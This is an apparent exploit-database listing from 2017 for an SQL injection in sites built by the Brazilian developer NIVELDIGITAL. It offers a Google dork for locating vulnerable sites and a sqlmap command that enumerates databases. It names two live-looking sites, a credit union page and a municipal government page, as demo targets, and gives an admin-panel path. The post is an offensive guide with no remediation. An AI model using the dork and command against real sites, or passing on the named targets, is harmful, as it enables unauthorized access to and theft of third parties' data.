NIVELDIGITAL SQL Injection Vulnerability

Published
Credit
Risk
2017.07.01
Shigi
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: intext:"Desenvolvido por: NIVELDIGITAL"

#####################################################
# Exploit Title : NIVELDIGITAL SQL Injection Vulnerability
# Google Dork : intext:"Desenvolvido por: NIVELDIGITAL"
# Exploit Author : Shigi
# Tested On : Windows 8 /Kali Linux
# Date : 01.07.2017
# Vendor Homepage :
#####################################################
#

[SQLmap]
# sqlmap -u "http://target.com/" --tamper=greatest --dbs


[Demo]

# http://www.sicrediunivales.com.br/sustentabilidade.php?id=2
# http://daes.juina.mt.gov.br/dicas.php?id=8

[Admin Panel]

# http://target.com/admin/

#
###########################################
# Discovered By : Shigi
# Twitter : @ChtShigi
# YouTube : https://www.youtube.com/channel/UCYTnimlKuYAKbPZqcWZE89w


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com